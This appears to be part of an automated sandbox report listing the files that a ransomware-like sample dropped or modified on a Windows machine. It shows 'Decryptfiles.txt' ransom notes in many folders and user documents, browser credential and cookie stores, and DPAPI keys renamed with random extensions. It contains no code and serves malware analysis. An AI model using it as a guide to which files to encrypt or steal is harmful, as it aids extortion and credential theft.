C:\Users\user\Downloads\PALRGUCVEH.jpg
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.xlsx
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.xlsx.JQkH (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Bing.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Live.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url
|
data
|
dropped
|
||
C:\Users\user\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Music\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\NTUSER.DAT.cJXQ
|
data
|
dropped
|
||
C:\Users\user\NTUSER.DAT.qCnN
|
data
|
dropped
|
||
C:\Users\user\OneDrive\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Camera Roll\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Saved Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Recent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Saved Games\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms
|
data
|
dropped
|
||
C:\Users\user\Videos\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\_curlrc.uNYF
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.cjKz
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.puIz
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG2.FdAV
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG2.tObf
|
data
|
modified
|
||
C:\Users\user\ntuser.ini
|
data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x66b629a6, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\Public\Libraries\RecordedTV.library-ms.WzIj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.tLrR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.OiLj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl.npGz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl.sVfx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.KeOu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.sNid (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.HVOS (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.qncC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav.PYlZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav.teqV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06.vmwy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.sOji (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\3bb58c52-85cd-4424-83c3-47720a094118.bKqV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred.OrxB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\c6cd337d-cbfc-4f3d-88c4-6fd10913a1a0.okPN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms.ufhc (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms.lVQa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms.ShPy (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms.TkAd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms.VCKl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms.fjFl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AUFZRAWBIW.png.KiCW (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.hFlS (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.YmlN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.png.ZoQN (copy)
|
MPEG-4 LOAS, 4 or more streams
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.jpg.kTZy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.xlsx.xShm (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.mp3.YvZq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf.cKtC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.xlsx.HJzw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.png.UonT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.docx.ceZd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.pdf.OAHV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EIVQSAOTAQ.jpg.pVsK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.docx.gRLx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.mp3.PmJs (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.docx.tZhU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.pdf.DlrP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.png.iIjQ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.png.VDCp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HVLFEFMHHB.png.yike (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYCBOPHQBT.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYCBOPHQBT.jpg.QjAL (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KGUUUSONWY.mp3.csdO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.jpg.kMsv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.mp3
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.mp3.SHdK (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf.MKGm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.mp3.kbXS (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.jpg.tzyh (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.xlsx.epBN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf.wIYr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.jpg.mNlr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.mp3.NMYH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.pdf.uAhJ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.docx.zMvk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg.lpLb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx.LjQt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.docx.TuJp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.xlsx.qeut (copy)
|
OpenPGP Public Key Version 7
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.docx.YxtN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx.KRvx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.jpg.mAbp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.mp3.xbaz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.pdf.EQVl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.xlsx.vNlY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.docx.OxTZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.pdf.RiQb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.png.NyvD (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZGGKNSUKOP.png.YwEB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.mp3.xPvB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK.Oewm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.aNtw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.FbeM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.KjSZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.aHcM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.iQyp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.WbXP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.json.AEYU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txt.XKfi (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.json.QOVf (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txt.lUvu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4.zrRw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json.ESGz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db.rYtu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini.jOVm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.json.dVLN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite.wuOD (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm.xtfY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite.fTNb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832118.b6281059-34c6-49d8-97c7-24de33b104ab.new-profile.jsonlz4.nOPz
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832120.4cb4db2a-ee68-4128-8ff4-f04bdc710c24.event.jsonlz4.PeDX
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4.XYFb
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4.LOMZ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4.bzUJ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4.ODpn
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838410.75265401-2d75-4127-a70f-7d6e61df69a0.health.jsonlz4.yZep
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4.vGPL
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.bin.qUZj
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-update.dBce
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\events.vzMK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed.pxDL
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627.CVFc
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610.qHsm
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490.SPWl
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966.ehIM
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.json.ivSj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\state.json.mvuG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.json.rZKM (copy)
|
zlib compressed data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json.RkSs (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm.SnxI (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite.xevd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.json.rXlM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db.BkFv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite.ZIjc (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt.QpNo (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm.TUCr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite.WVBE (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js.VLXF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite.qTtP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925.iMbU
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24.aKjk
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\75265401-2d75-4127-a70f-7d6e61df69a0.ItEo
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49.eGBp
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.EhgA
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104ab.YFMO
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.LwtW
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.KPUv
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4.zKql (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json.HejR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4.fVxs
(copy)
|
SysEx File -
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528.XTKI
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4.DZcJ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.json.jBxi (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite.wqIZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite.EAKu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2.stqu
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm.zfRr
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.cgxv
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm.TZCu
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.rnay
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm.eKXZ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite.JwGW
(copy)
|
data
|
dropped
|
||
